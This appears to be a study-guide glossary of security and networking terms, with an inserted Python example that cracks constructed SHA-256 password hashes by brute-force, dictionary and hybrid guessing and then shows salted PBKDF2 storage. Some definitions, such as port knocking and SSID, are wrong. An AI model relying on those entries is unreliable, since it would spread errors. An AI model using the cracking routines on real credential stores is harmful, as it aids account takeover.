Ethernet   Baseband LAN specification developed by Xerox Corporation, Intel, and Digital Equipment Corporation. This is one of the least expensive, most widely deployed networking standards; it uses the CSMA/CD method of media access control.

ethical hacker   A computer security expert who performs security audits and penetration tests against systems or network segments, with the owner’s full knowledge and permission, in an effort to increase security.

event   Any network incident that prompts some kind of log entry or other notification.

exploit   Software code, a portion of data, or a sequence of commands intended to take advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer software or hardware.

exposure factor   The percentage of an asset’s value that would be lost if a specific threat were realized. The exposure factor (EF) is a subjective estimate the person assessing risk must define; multiplied by the asset value it gives the single loss expectancy (SLE).

Extensible Authentication Protocol (EAP)   Originally an extension of PPP, EAP is an authentication framework that carries many different authentication methods (certificates, passwords, tokens, and so on). It underlies 802.1X port-based authentication on wired and wireless networks, where variants such as EAP-TLS and PEAP are common.

false acceptance rate (FAR)   The rate at which a biometric system will incorrectly identify an unauthorized individual and allow them access (see false negative).

false negative   A situation in which an IDS does not trigger on an event that was an intrusion attempt. False negatives are considered more dangerous than false positives.

false positive   A situation in which an IDS or other sensor triggers on an event as an intrusion attempt, when it was actually legitimate traffic.

false rejection rate (FRR)   The rate at which a biometric system will incorrectly reject an access attempt by an authorized user.

Fast Ethernet   An Ethernet networking system transmitting data at 100 million bits per second (Mbps), ten times the speed of the earlier Ethernet standard. Derived from the Ethernet 802.3 standard, it is most commonly deployed as 100BASE-TX over twisted-pair copper.

Fiber Distributed Data Interface (FDDI)   LAN standard, defined by ANSI X3T9.5, specifying a 100-Mbps token-passing network using fiber-optic cable and a dual-ring architecture for redundancy, with transmission distances of up to 2 kilometers.

File Allocation Table (FAT)   A computer file system architecture used in Windows, OS/2, and most memory cards.

File Transfer Protocol (FTP)   An Application layer protocol, using TCP, for transporting files across an Internet connection. FTP transmits in clear text.

filter   A set of rules defined to screen network packets based on source address, destination address, or protocol. These rules determine whether the packet will be forwarded or discarded.

Finger   An early network application that provides information on users currently logged on to a machine.

firewalking   A technique for mapping a firewall’s rules without waiting for a response from the protected hosts. Probes are sent with an IP time-to-live set to expire one hop beyond the firewall; a TTL-exceeded reply from the next hop means the firewall forwarded that port or protocol, while silence means it was filtered.

firewall   Software or hardware components that restrict access between a protected network and the Internet, or between other sets of networks, to block unwanted use or attacks.

flood   Traffic-passing technique used by bridges and switches in which traffic received on an interface is sent out all interfaces on the device except the interface on which the information was originally received. Traffic on a switch is flooded when it is broadcast in nature (intended for a broadcast address, as with ARP or other protocols) or if the switch does not have an entry in the CAM table for the destination MAC.

footprinting   All measures and techniques taken to gather information about an intended target. Footprinting can be passive or active.

forwarding   The process of sending a packet or frame toward the destination. In a switch, messages are forwarded only to the port to which they are addressed.

fragmentation   Process of breaking a packet into smaller units when it is being transmitted over a network medium that’s unable to support a transmission unit the original size of the packet.

FreeBSD   A free and popular version of the Unix operating system.

fully qualified domain name (FQDN)   A fully qualified domain name consists of a host and domain name, including a top-level domain such as .com, .net, .mil, .edu, and so on.

gap analysis   A tool that helps a company compare its actual performance with its potential performance.

gateway   A device that provides access between two or more networks. Gateways are typically used to connect dissimilar networks.

GET   The HTTP request method used to retrieve a resource from a server. (Command-line FTP clients also offer a get command to download a file; on the wire it is sent to the server as RETR.)

Government Access to Keys (GAK)   An attempt through key disclosure laws to have software companies provide copies of all keys to the government, which will be used only when a warrant is provided during law enforcement efforts.

gray hat   A skilled hacker who straddles the line between white hat (hacking only with permission and within guidelines) and black hat (malicious hacking for personal gain). Gray hats sometime perform illegal acts to exploit technology with the intent of achieving better security.

gray-box testing   A penetration test in which the ethical hacker has limited knowledge of the intended target(s). Designed to simulate an internal but non-system-administrator-level attack.

hack value   The idea a hacker holds about the perceived worth or interest in attacking a target.

hacktivism   The act or actions of a hacker to put forward a cause or a political agenda, to affect some societal change, or to shed light on something he feels to be a political injustice. These activities are usually illegal in nature.

halo effect   A well-known and well-studied phenomenon of human nature, whereby a single trait influences the perception of other traits.

hardware keystroke logger   A hardware device used to log keystrokes covertly. Hardware keystroke loggers are dangerous because they cannot be detected through regular software/anti-malware scanning.

hash   A fixed-length value computed from a piece of data by a hashing algorithm and used to verify data integrity: any change to the input yields a different hash. Hashes are commonly used to check files after download against the value published on the site, and to store passwords in a form that does not reveal the password itself; for the latter, a per-user salt and a deliberately slow algorithm are needed to resist cracking.

hashing algorithm   A one-way mathematical function that generates a fixed-length hash from input of any length. MD5 and SHA-1 are hashing algorithms, though both are now considered broken with respect to collision resistance; SHA-256 and its relatives are preferred for new designs.

heuristic scanning   Method used by antivirus software to detect new, unknown viruses that have not yet been identified; based on a piece-by-piece examination of a program, heuristic scanning looks for a sequence or sequences of instructions that differentiate the virus from “normal” programs.

HIDS   Host-based IDS. An IDS that resides on the host, protecting against file and folder manipulation and other host-based attacks and actions.

Hierarchical File System (HFS)   The file system used by classic Mac OS. Its successor, HFS+, was the default on macOS until it was replaced by APFS.

honeynet   A network deployed as a trap to detect, deflect, or deter unauthorized use of information systems.

honeypot   A host designed to collect data on suspicious activity.

hot site   A fully operational off-site data-processing facility equipped with hardware and system software to be used in the event of a disaster.

HTTP tunneling   A firewall-evasion technique whereby packets are wrapped in HTTP, as a covert channel to the target.

human-based social engineering   Using conversation or some other interaction between people to gather useful information.

hybrid attack   A password attack that extends a dictionary attack with brute-force-style mangling. Dictionary words are varied by appending or prepending characters, changing case, or substituting characters, so that guesses such as a word followed by a year are tried without enumerating the entire keyspace.
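The following added example, which is not part of the glossary, brings together the brute-force, hash, hashing algorithm and hybrid attack entries: it cracks SHA-256 password hashes with each strategy and counts the guesses each needed, then shows the salted, iterated storage form (PBKDF2-HMAC-SHA256) that makes every guess expensive and precomputed tables useless. The passwords, word list and salt are constructed.

```python
"""Added example: brute-force, dictionary and hybrid password cracking against
a plain SHA-256 hash, and salted/iterated storage that resists them.
Passwords, word list and salt below are constructed."""
import hashlib
import hmac
import itertools
import string

def sha256_hex(password):
    """Unsalted single hash: fast for the defender and therefore fast for the attacker."""
    return hashlib.sha256(password.encode()).hexdigest()

def brute_force(target_hex, charset=string.ascii_lowercase + string.digits, max_len=3):
    """Try every string over `charset` up to `max_len`. Returns (password, attempts)."""
    attempts = 0
    for length in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            attempts += 1
            candidate = "".join(combo)
            if sha256_hex(candidate) == target_hex:
                return candidate, attempts
    return None, attempts

WORDLIST = ["password", "letmein", "dragon", "summer", "winter"]   # constructed

def dictionary_attack(target_hex, words=WORDLIST):
    """Try each word as-is. Returns (password, attempts)."""
    for attempts, word in enumerate(words, start=1):
        if sha256_hex(word) == target_hex:
            return word, attempts
    return None, len(words)

def hybrid_attack(target_hex, words=WORDLIST, suffixes=None):
    """Dictionary words with case mangling and common suffixes appended."""
    if suffixes is None:
        suffixes = [""] + [str(n) for n in range(100)] + ["!", "123", "2024"]
    attempts = 0
    for word in words:
        for variant in (word, word.capitalize(), word.upper()):
            for suffix in suffixes:
                attempts += 1
                candidate = variant + suffix
                if sha256_hex(candidate) == target_hex:
                    return candidate, attempts
    return None, attempts

ITERATIONS = 100_000   # tuned so one verification costs noticeable CPU

def store_password(password, salt, iterations=ITERATIONS):
    """Salted, iterated hash: the per-user salt defeats precomputed tables and
    the iteration count multiplies the cost of every guess."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)

def verify_password(password, salt, stored, iterations=ITERATIONS):
    return hmac.compare_digest(store_password(password, salt, iterations), stored)

if __name__ == "__main__":
    print(brute_force(sha256_hex("a7z")))
    print(dictionary_attack(sha256_hex("dragon")))
    print(hybrid_attack(sha256_hex("Summer2024")))
    salt = b"constructed-per-user-salt"
    print(verify_password("Summer2024", salt, store_password("Summer2024", salt)))
```

With the unsalted hash, every guess costs one SHA-256 and the same work cracks every user who chose the same password; with PBKDF2 each guess costs ITERATIONS hashes and must be repeated per salt.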

hybrid cloud   A cloud model that is a composite of two or more cloud deployment models (public, private, or community).

Hypertext Transfer Protocol (HTTP)   A communications protocol used for browsing the Internet.

Hypertext Transfer Protocol Secure (HTTPS)   A hybrid of the HTTP and SSL/TLS protocols that provides encrypted communication and secure identification of a web server.

IaaS   Infrastructure as a Service. A cloud computing type providing virtualized computing resources over the Internet.

identity theft   A form of fraud in which someone pretends to be someone else by assuming that person’s identity, typically in order to access resources or obtain credit and other benefits in that person’s name.

impersonation   A social engineering effort in which the attacker pretends to be an employee, a valid user, or even an executive to elicit information or access.

inference attack   An attack in which the hacker can derive information from the ciphertext without actually decoding it. Sensitive information can be considered compromised if an adversary can infer its real value with a high level of confidence.

information technology (IT) asset criticality   The level of importance assigned to an IT asset.

information technology (IT) asset valuation   The monetary value assigned to an IT asset.

information technology (IT) infrastructure   The combination of all IT assets, resources, components, and systems.

information technology (IT) security architecture and framework   A document describing information security guidelines, policies, procedures, and standards.

Information Technology Security Evaluation Criteria (ITSEC)   A structured set of criteria for evaluating computer security within products and systems produced by European countries; it has been largely replaced by the Common Criteria.

infrastructure mode   A wireless networking mode where all clients connect to the wireless network through a central access point.

initial sequence number (ISN)   A number assigned during TCP startup sessions that tracks how much information has been moved. This number is used by hackers when hijacking sessions.

insider affiliate   A spouse, friend, or client of an employee who uses the employee’s credentials to gain physical or logical access to organizational resources.

insider associate   A person with limited authorized access to the organization; contractors, guards, and cleaning services are all examples.

Institute of Electrical and Electronics Engineers (IEEE)   An organization composed of engineers, scientists, and students who issue standards related to electrical, electronic, and computer engineering.

integrity   The security property that data is not modified in an unauthorized and undetected manner. Also, this is the principle of taking measures to ensure that data received is in the same condition and state as when it was originally transmitted.

Interior Gateway Protocol (IGP)   An Internet routing protocol used to exchange routing information within an autonomous system.

International Organization for Standardization (ISO)   An international organization composed of national standards bodies from more than 75 countries. ISO developed the OSI reference model.

Internet Assigned Numbers Authority (IANA)   The organization that governs the Internet’s top-level domains, IP address allocation, and port number assignments.

Internet Control Message Protocol (ICMP)   A protocol used to pass control and error messages between nodes on the Internet.

Internet of Things (IoT)   The collection of devices using sensors, software, storage, and electronics to collect, analyze, store, and share data among themselves or to a user, with or without human intervention or action.

Internet Protocol (IP)   A protocol for transporting data packets across a packet-switched internetwork (such as the Internet). IP is a routed protocol.

Internet Protocol Security (IPSec) architecture   A suite of protocols used for securing Internet Protocol (IP) communications by authenticating and encrypting each IP packet of a communication session. This suite includes protocols for establishing mutual authentication between agents at session establishment and for negotiating the cryptographic keys to be used throughout the session.

Internet service provider (ISP)   A business, government agency, or educational institution that provides access to the Internet.

intranet   A self-contained network with a limited number of participants who extend limited trust to one another in order to accomplish an agreed-upon goal.

intrusion detection system (IDS)   A security tool designed to protect a system or network against attacks by comparing traffic patterns against a list of both known attack signatures and general characteristics of how attacks may be carried out. Threats are rated and reported.

intrusion prevention system (IPS)   A security tool designed to protect a system or network against attacks by comparing traffic patterns against a list of both known attack signatures and general characteristics of how attacks may be carried out. Threats are rated and protective measures taken to prevent the more significant threats.

IoT Gateway   A device designed to send collected data from IoT devices to the user or to data storage (the cloud) for use later.

iris scanner   A biometric device that uses pattern-recognition techniques based on images of the irises of an individual’s eyes.

ISO 17799   A standard that provides best-practice recommendations on information security management for use by those responsible for initiating, implementing, or maintaining Information Security Management Systems (ISMS). Information security is defined within the standard in the context of the CIA triad.

Kerberos   A widely used authentication protocol developed at the Massachusetts Institute of Technology (MIT). Kerberos authentication uses tickets, a ticket granting service, and a key distribution center.

key exchange protocol   A method in cryptography by which cryptographic keys are exchanged between users, thus allowing use of a cryptographic algorithm (for example, the Diffie-Hellman key exchange).

keylogger   A software application or hardware device that captures user keystrokes.

last in first out (LIFO)   A programming principle whereby the last piece of data added to the stack is the first piece of data taken off.

Level I assessment   An evaluation consisting of a document review, interviews, and demonstrations. No hands-on testing is performed.

Level II assessment   An evaluation consisting of a document review, interviews, and demonstrations, as well as vulnerability scans and hands-on testing.

Level III assessment   An evaluation in which testers attempt to penetrate the network.

Lightweight Directory Access Protocol (LDAP)   An industry-standard protocol used for accessing and managing information within a directory service; an application protocol for querying and modifying data using directory services running over TCP/IP.

limitation of liability and remedies   A legal limit on the amount of financial liability and remedies the organization is responsible for taking on.

local area network (LAN)   A computer network confined to a relatively small area, such as a single building or campus.

logic bomb   A piece of code intentionally inserted into a software system that will perform a malicious function when specified conditions are met at some future point.

MAC filtering   A method of permitting network access only to MAC addresses in a preapproved list. Addresses not matching the list are blocked.

macro virus   A virus written in a macro language and usually embedded in document or spreadsheet files.

malicious code   Software or firmware intended to perform an unauthorized process that will have an adverse impact on the confidentiality, integrity, or availability of an information system. A virus, worm, Trojan horse, or other code-based entity that infects a host.

malware   A program or piece of code inserted into a system, usually covertly, with the intent of compromising the confidentiality, integrity, or availability of the victim’s data, applications, or operating system. Malware consists of viruses, worms, and other malicious code.

mandatory access control (MAC)   A means of restricting access to system resources based on the sensitivity (as represented by a label) of the information contained in the system resource and the formal authorization (that is, clearance) of users to access information of such sensitivity.

man-in-the-middle attack   An attack where the hacker positions himself between the client and the server to intercept (and sometimes alter) data traveling between the two.

mantrap   A small space having two sets of interlocking doors; the first set of doors must close before the second set opens. Typically authentication is required for each door, often using different factors. For example, a smartcard may open the first door, and a personal identification number entered on a number pad opens the second.

master boot record infector   A virus designed to infect the master boot record.

maximum tolerable downtime (MTD)   A measurement of the potential cost due to a particular asset being unavailable, used as a means to prioritize the recovery of assets should the worst occur.

MD5   A hashing algorithm that results in a 128-bit output.

Media Access Control (MAC)   A sublayer of Layer 2 of the OSI model, the Data Link layer. It provides addressing and channel access control mechanisms that enable several terminals or network nodes to communicate within a multipoint network.

methodology   A documented process for a procedure designed to be consistent, repeatable, and accountable.

minimum acceptable level of risk   An organization’s threshold for the seven areas of information security responsibility. This level is established based on the objectives for maintaining the confidentiality, integrity, and availability of the organization’s IT assets and infrastructure and will determine the resources expended for information security.

multipartite virus   A computer virus that infects and spreads in multiple ways.

Multipurpose Internet Mail Extensions (MIME)   An extensible mechanism for e-mail. A variety of MIME types exist for sending content such as audio, binary, or video using the Simple Mail Transfer Protocol (SMTP).

National Security Agency (NSA) INFOSEC Assessment Methodology (IAM)   A systematic process for the assessment of security vulnerabilities.

NetBSD   A free, open source version of the Berkeley Software Distribution of Unix, often used in embedded systems.

NetBus   A software program for remotely controlling a Microsoft Windows computer system over a network. Generally it is considered malware.

network access server   A device providing temporary, on-demand, point-to-point network access to users.

Network Address Translation (NAT)   A technology where you advertise one IP address externally and data packets are rerouted to the appropriate IP address inside your network by a device providing translation services. In this way, IP addresses of machines on your internal network are hidden from external users.

Network Basic Input/Output System (NetBIOS)   An API that provides services related to the OSI model’s Session layer, allowing applications on separate computers to communicate over a LAN.

network interface card (NIC)   An adapter that provides the physical connection to send and receive data between the computer and the network media.

network operations center (NOC)   One or more locations from which control is exercised over a computer, television broadcast, or telecommunications network.

network tap   Any kind of connection that allows you to see all traffic passing by. Generally used in reference to a network-based IDS (NIDS) to monitor all traffic.

Nmap   An open source scanning utility used to discover hosts and services on a network.

node   A device on a network.

nonrepudiation   The means by which a recipient of a message can ensure the identity of the sender and that neither party can deny having sent or received the message. The most common method is through digital certificates.

NOP   A command that instructs the system processor to do nothing. Many overflow attacks involve stringing several NOP operations together (known as a NOP sled).

nslookup   A network administration command-line tool available for many operating systems for querying the Domain Name System (DNS) to obtain domain name or IP address mappings or any other specific DNS record.

NT LAN Manager (NTLM)   The default network authentication suite of protocols for Windows NT 4.0—retained in later versions for backward compatibility. NTLM is considered insecure and was replaced by NTLMv2.

null session   An anonymous connection to an administrative share (IPC$) on a Windows machine. Null sessions allow for enumeration of Windows machines, among other attacks.

open source   Describes practices in production and development that promote access to the end product’s source materials.

Open Source Security Testing Methodology Manual (OSSTMM)   A peer-reviewed, formalized methodology of security testing and analysis.

Open System Interconnection (OSI) reference model   A network architecture framework developed by ISO that describes the communications process between two systems across the Internet in seven distinct layers.

OpenBSD   A Unix-like computer operating system descending from the BSD. OpenBSD includes a number of security features absent or optional in other operating systems.

operating system attack   An attack that exploits the common mistake many people make when installing operating systems—that is, accepting and leaving all the defaults.

out-of-band signaling   Transmission using channels or frequencies outside those normally used for data transfer; often used for error reporting.

outsider associate   An untrusted outsider using open, or illicitly gained, access to an organization’s resources.

overt channel   A communications path, such as the Internet, authorized for data transmission within a computer system or network.

PaaS   Platform as a Service. A cloud computing type geared toward software development, providing a platform that allows subscribers to develop applications without building the infrastructure it would normally take to develop and launch software.

packer   A crypter that uses compression to pack malware executables into smaller sizes to avoid detection.

packet   A unit of information formatted according to specific protocols, generally regarded as being used in OSI Layer 3, that allows precise transmittal of data from one network node to another. Also called a datagram or data packet, a packet contains a header (container) and a payload (contents). Any IP message larger than 1500 bytes will be fragmented into packets for transmission.

packet filtering   Controlling access to a network by analyzing the headers of incoming and outgoing packets and letting them pass or discarding them based on rule sets created by a network administrator. A packet filter allows or denies packets based on destination, source, and/or port.

Packet Internet Groper (ping)   A utility that sends an ICMP Echo message to determine whether a specific IP address is accessible; if the message receives a reply, the address is reachable.

parameter tampering   An attack where the hacker manipulates parameters within the URL string in hopes of modifying data.

passive attack   An attack against an authentication protocol in which the attacker intercepts data in transit along the network between the claimant and verifier but does not alter the data (in other words, eavesdropping).

Password Authentication Protocol (PAP)   A simple PPP authentication mechanism in which the user name and password are transmitted in clear text to prove identity. PAP compares the user name and password to a table listing authorized users.

patch   A piece of software, provided by the vendor, intended to update or fix known, discovered problems in a computer program or its supporting data.

pattern matching   The act of checking some sequence of tokens for the presence of the constituents of some pattern.

payload   The contents of a packet. A system attack requires the attacker to deliver a malicious payload that is acted upon and executed by the system.

Payment Card Industry Data Security Standard (PCI-DSS)   A security standard for organizations handling credit cards, ATM, and other point-of-sale cards. The standards apply to all groups and organizations involved in the entirety of the payment process—from card issuers to merchants to those storing and transmitting card information—and consist of 12 requirements.

penetration testing   A method of evaluating the security of a computer system or network by simulating an attack from a malicious source.

personal identification number (PIN)   A secret, typically consisting of only decimal digits, that a claimant memorizes and uses to authenticate his identity.

phishing   The use of deceptive computer-based means to trick individuals into disclosing sensitive personal information—usually via a carefully crafted e-mail message.

physical security   Security measures, such as a locked door, perimeter fence, or security guard, to prevent or deter physical access to a facility, resource, or information stored on physical media.

piggybacking   When an authorized person allows (intentionally or unintentionally) someone to pass through a secure door, despite the intruder not having a badge.

ping sweep   The process of pinging each address within a subnet to map potential targets. Ping sweeps are unreliable and easily detectable but very fast.

polymorphic virus   Malicious code that uses a polymorphic engine to mutate while keeping the original algorithm intact; the code changes itself each time it runs, but the function of the code will not change.

Point-to-Point Protocol (PPP)   Provides router-to-router or host-to-network connections over asynchronous and synchronous circuits.

Point-to-Point Tunneling Protocol (PPTP)   A VPN tunneling protocol with encryption. PPTP connects two nodes in a VPN by using one TCP port for negotiation and authentication and one IP protocol for data transfer.

Port Address Translation (PAT)   A NAT method in which multiple internal hosts, using private IP addressing, can be mapped through a single public IP address using the session IDs and port numbers. An internal global IP address can support in excess of 65,000 concurrent TCP and UDP connections.

port knocking   Another term for firewalking—the method of externally testing ports on a firewall by generating a connection attempt on each port, one by one.

port redirection   The process of directing a protocol from one port to another.

port scanning   The process of using an application to remotely identify open ports on a system (for example, whether systems allow connections through those ports).

POST   An HTTP command to transmit text to a web server for processing. This is the opposite of an HTTP GET.

Post Office Protocol 3 (POP3)   An Application layer protocol used by local e-mail clients to retrieve e-mail from a remote server over a TCP/IP connection.

Presentation layer   Layer 6 of the OSI reference model. The Presentation layer ensures information sent by the Application layer of the sending system will be readable by the Application layer of the receiving system.

Pretty Good Privacy (PGP)   A data encryption/decryption program often used for e-mail and file storage.

private cloud   A cloud model that is operated solely for a single organization (a.k.a. single-tenant environment) and is usually not pay-as-you-go.

private key   The secret portion of an asymmetric key pair typically used to decrypt or digitally sign data. The private key is never shared and is always used for decryption, with one notable exception: the private key is used to encrypt the digital signature.

private network address   A nonroutable IP address range intended for use only within the confines of a single organization, falling within the predefined range of 10.0.0.0, 172.16–31.0.0, or 192.168.0.0.

promiscuous mode   A configuration of a network card that makes the card pass all traffic it receives to the central processing unit rather than just frames addressed to it—a feature normally used for packet sniffing and bridged networking for hardware virtualization. Windows machines use WinPcap for this; Linux uses libpcap.

protocol   A formal set of rules describing data transmission, especially across a network. A protocol determines the type of error checking, the data compression method, how the sending device will indicate completion, how the receiving device will indicate the message was received, and so on.

protocol stack   A set of related communications protocols operating together as a group to address communication at some or all of the seven layers of the OSI reference model.

proxy server   A device set up to send a response on behalf of an end node to the requesting host. Proxies are generally used to obfuscate the host from the Internet.

public cloud   A cloud model where services are provided over a network that is open for public use (such as the Internet).

public key   The public portion of an asymmetric key pair typically used to encrypt data or verify signatures. Public keys are shared and are used to encrypt messages.

public key infrastructure (PKI)   A set of hardware, software, people, policies, and procedures needed to create, manage, distribute, use, store, and revoke digital certificates.

pure insider   An employee with all the rights and access associated with being employed by the company.

purple team   A single team of security professionals who perform cooperative vulnerability and penetration assessments (CVPA).

qualitative analysis   A nonnumerical, subjective risk evaluation. This is used with qualitative assessment (an evaluation of risk that results in ratings of none, low, medium, or high for the probability).

quality of service (QoS)   A defined measure of service within a network system—administrators may assign a higher QoS to one host, segment, or type of traffic.

quantitative risk assessment   Calculations of two components of risk (R): the magnitude of the potential loss (L), and the probability (P) that the loss will occur.

queue   A backlog of packets stored in buffers and waiting to be forwarded over an interface.

RAID (Redundant Array of Independent Disks)   Formerly Redundant Array of Inexpensive Disks, RAID is a technology that provides increased storage functions and reliability through redundancy. This is achieved by combining multiple disk drive components into a logical unit, where data is distributed across the drives in one of several ways, called RAID levels.

reconnaissance   The steps taken to gather evidence and information on the targets you want to attack.

remote access   Access by information systems (or users) communicating from outside the information system security perimeter.

remote procedure call (RPC)   A protocol that allows a client computer to request services from a server and the server to return the results.

replay attack   An attack where the hacker repeats a portion of a cryptographic exchange in hopes of fooling the system into setting up a communications channel.

request for comments (RFC)   A series of documents and notes on standards used or proposed for use on the Internet; each is identified by a number.

reverse lookup; reverse DNS lookup   Used to find the domain name associated with an IP address; the opposite of a DNS lookup.

reverse social engineering   A social engineering attack that manipulates the victim into calling the attacker for help.

RID   Resource identifier. This is the last portion of the SID that identifies the user to the system in Windows. An RID of 500 identifies the administrator account.

Rijndael   An encryption standard designed by Joan Daemen and Vincent Rijmen. This was chosen by a NIST contest to be the Advanced Encryption Standard (AES).

ring topology   A networking configuration where all nodes are connected in a circle with no terminated ends on the cable.

risk   The potential for damage to or loss of an IT asset.

risk acceptance   An informed decision to accept the potential for damage to or loss of an IT asset.

risk assessment   An evaluation conducted to determine the potential for damage to or loss of an IT asset.

risk avoidance   A decision to reduce the potential for damage to or loss of an IT asset by taking some type of action.

risk transference   Shifting responsibility from one party to another—for example, through purchasing an insurance policy.

rogue access point   A wireless access point that either has been installed on a secure company network without explicit authorization from a local network administrator or has been created to allow a hacker to conduct a man-in-the-middle attack.

role-based access control   An approach to restricting system access to authorized users in which roles are created for various job functions. The permissions to perform certain operations are assigned to specific roles. Members of staff (or other system users) are assigned particular roles, and through those role assignments they acquire the permissions to perform particular system functions.

rolling code   The code used by a key fob to unlock (and, in some cases, start) a car is called a rolling (or hopping) code. Stealing this code and reusing it is referred to as a rolling code attack.

rootkit   A set of tools (applications or code) that enables administrator-level access to a computer or computer network and is designed to obscure the fact that the system has been compromised. Rootkits are dangerous malware entities that provide administrator control of machines to attackers and are difficult to detect and remove.

roots of trust (RoT)   A set of functions within the trusted computing module that are always trusted by the computer’s operating system (OS).

route   1. The path a packet travels to reach the intended destination. Each individual device along the path traveled is called a hop. 2. Information contained on a device containing instructions for reaching other nodes on the network. This information can be entered dynamically or statically.

routed protocol   A protocol defining packets that are able to be routed by a router.

router   A device that receives and sends data packets between two or more networks; the packet headers and a forwarding table provide the router with the information necessary for deciding which interface to use to forward packets.

Routing Information Protocol (RIP)   A distance-vector routing protocol that employs the hop count as a routing metric. The “hold down time,” used to define how long a route is held in memory, is 180 seconds. RIP prevents routing loops by implementing a limit on the number of hops allowed in a path from the source to a destination. The maximum number of hops allowed for RIP is 15. This hop limit, however, also limits the size of networks that RIP can support. A hop count of 16 is considered an infinite distance and is used to deprecate inaccessible, inoperable, or otherwise undesirable routes in the selection process.

Routing Protocol   A standard developed to enable routers to exchange messages containing information about routes to reach subnets in the network.

rule-based access control   A set of rules defined by a system administrator that indicates whether access is allowed or denied to resource objects.

RxBoot   A limited-function version of the Internetworking Operating System (IOS), held in read-only memory in some earlier models of Cisco devices, capable of performing several seldom-needed low-level functions such as loading a new IOS into Flash memory to recover Flash if corrupted or deleted.

SaaS   Software as a Service. A type of cloud computing used as a software distribution model.

SAM   The Security Accounts Manager file in Windows stores all the password hashes for the system.

Sarbanes-Oxley Act (SOX)   SOX was created to make corporate disclosures more accurate and reliable in order to protect the public and investors from shady behavior. There are 11 titles within SOX.

scope creep   The change or growth of a project’s scope.

script kiddie   A derogatory term used to describe an attacker, usually new to the field, who uses simple, easy-to-follow scripts or programs developed by others to attack computer systems and networks and deface websites.

secure channel   A means of exchanging information from one entity to another using a process that does not provide an attacker the opportunity to reorder, delete, insert, or read information.

Secure/Multipurpose Internet Mail Extensions (S/MIME)   A standard for encrypting and authenticating MIME data; used primarily for Internet e-mail.

Secure Sockets Layer (SSL)   A protocol that uses a private key to encrypt data before transmitting confidential documents over the Internet; widely used on e-commerce, banking, and other sites requiring privacy.

security breach or security incident   The exploitation of a security vulnerability.

security bulletins   An announcement, typically from a software vendor, of a known security vulnerability in a program; often the bulletin contains instructions for the application of a software patch.

security by obscurity   A principle in security engineering that attempts to use anonymity and secrecy (of design, implementation, and so on) to provide security; the footprint of the organization, entity, network, or system is kept as small as possible to avoid interest by hackers. The danger is that a system relying on security by obscurity may have theoretical or actual security vulnerabilities, but its owners or designers believe the flaws are not known.

security controls   Safeguards or countermeasures to avoid, counteract, or minimize security risks.

security defect   An unknown deficiency in software or some other product that results in a security vulnerability being identified.

security incident response team (SIRT)   A group of experts that handles computer security incidents.

security kernel   The central part of a computer or communications system hardware, firmware, and software that implements the basic security procedures for controlling access to system resources.

segment   A section or subset of the network. Often a router or other routing device provides the endpoint of the segment.

separation of duties   The concept of having more than one person required to complete a task.

Serial Line Internet Protocol (SLIP)   A protocol for exchanging packets over a serial line.

Service Oriented Architecture (SOA)   An API that makes it easier for application components to cooperate and exchange information on systems connected over a network: it’s designed to allow software components to deliver information directly to other components over a network.

service set identifier (SSID)   A value assigned to uniquely identify a single wide area network (WAN) in wireless LANs. SSIDs are broadcast by default and are sent in the header of every packet. SSIDs provide no encryption or security.

service level agreements (SLAs)   A part of a service contract where the level of service is formally defined; may be required as part of the initial pen test agreements.

session hijacking   An attack in which a hacker steps between two ends of an already established communication session and uses specialized tools to guess sequence numbers to take over the channel.

session splicing   A method used to prevent IDS detection by dividing the request into multiple parts that are sent in different packets.

sheepdip   A stand-alone computer, kept off the network, that is used for scanning potentially malicious media or software.

shoulder surfing   Looking over an authorized user’s shoulder in order to steal information (such as authentication information).

shrink-wrap code attacks   Attacks that take advantage of the built-in code and scripts most off-the-shelf applications come with.

SID   Security identifier. The method by which Windows identifies user, group, and computer accounts for rights and permissions.

sidejacking   A hacking method for stealing the cookies used during a session build and replaying them for unauthorized connection purposes.

signature scanning   A method for detecting malicious code on a computer where the files are compared to signatures of known viruses stored in a database.

sign-in seal   An e-mail protection method using a secret message or image that can be referenced on any official communication with the site; if an e-mail is received without the image or message, the recipient knows it is not legitimate.

Simple Mail Transfer Protocol (SMTP)   An Application layer protocol for sending electronic mail between servers.

Simple Network Management Protocol (SNMP)   An Application layer protocol for managing devices on an IP network.

Simple Object Access Protocol (SOAP)   Used for exchanging structured information, such as XML-based messages, in the implementation of web services.

single loss expectancy (SLE)   The monetary value expected from the occurrence of a risk on an asset. It is mathematically expressed as

single loss expectancy (SLE) = asset value (AV) × exposure factor (EF)

where EF represents the impact of the risk on the asset, expressed as the percentage of the asset lost. As an example, if the AV is reduced by two-thirds, the exposure factor value is 0.66. If the asset is completely lost, the EF is 1.0. The result is a monetary value in the same unit in which the AV is expressed.

site survey   An inspection of a place where a company or individual proposes to work, to gather the necessary information for a design or risk assessment.

smartcard   A card with a built-in microprocessor and memory used for identification or financial transactions. The card transfers data to and from a central computer when inserted into a reader.

smishing   An attack using text messaging, where a user is tricked into downloading malware onto his cellular phone or other mobile device.

Smurf attack   A denial-of-service attack where the attacker sends a ping to the network’s broadcast address from the spoofed IP address of the target. All systems in the subnet then respond to the spoofed address, eventually flooding the device.

sniffer   Computer software or hardware that can intercept and log traffic passing over a digital network.

SOA record   Start of Authority record. This record identifies the primary name server for the zone. The SOA record contains the hostname of the server responsible for all DNS records within the namespace, as well as the basic properties of the domain.

social engineering   A nontechnical method of hacking. Social engineering is the art of manipulating people, whether in person (human based) or via computing methods (computer based), into providing sensitive information.

source routing   A network traffic management technique designed to allow applications to specify the route a packet will take to a destination, regardless of what the route tables between the two systems say.

spam   An electronic version of junk mail. Unsolicited commercial e-mail sent to numerous recipients.

spoofing   A method of falsely identifying the source of data packets; often used by hackers to make it difficult to trace where an attack originated.

spyware   A type of malware that covertly collects information about a user.

stateful packet filtering   A method of network traffic filtering that monitors the entire communications process, including the originator of the session and from which direction it started.

steganography   The art and science of creating a covert message or image within another message, image, audio, or video file.

stream cipher   A symmetric key cipher where plain-text bits are combined with a pseudorandom cipher bit stream (keystream), typically by an exclusive-or (XOR) operation. In a stream cipher, the plain-text digits are encrypted one at a time, and the transformation of successive digits varies during the encryption.

suicide hacker   A hacker who aims to bring down critical infrastructure for a “cause” and does not worry about the penalties associated with his actions.

sybil attack   An IoT DoS attack using multiple forged identities to create the illusion of traffic congestion, which affects everyone else in the local IoT network.

symmetric algorithm   A class of algorithms for cryptography that use the same cryptographic key for both decryption and encryption.

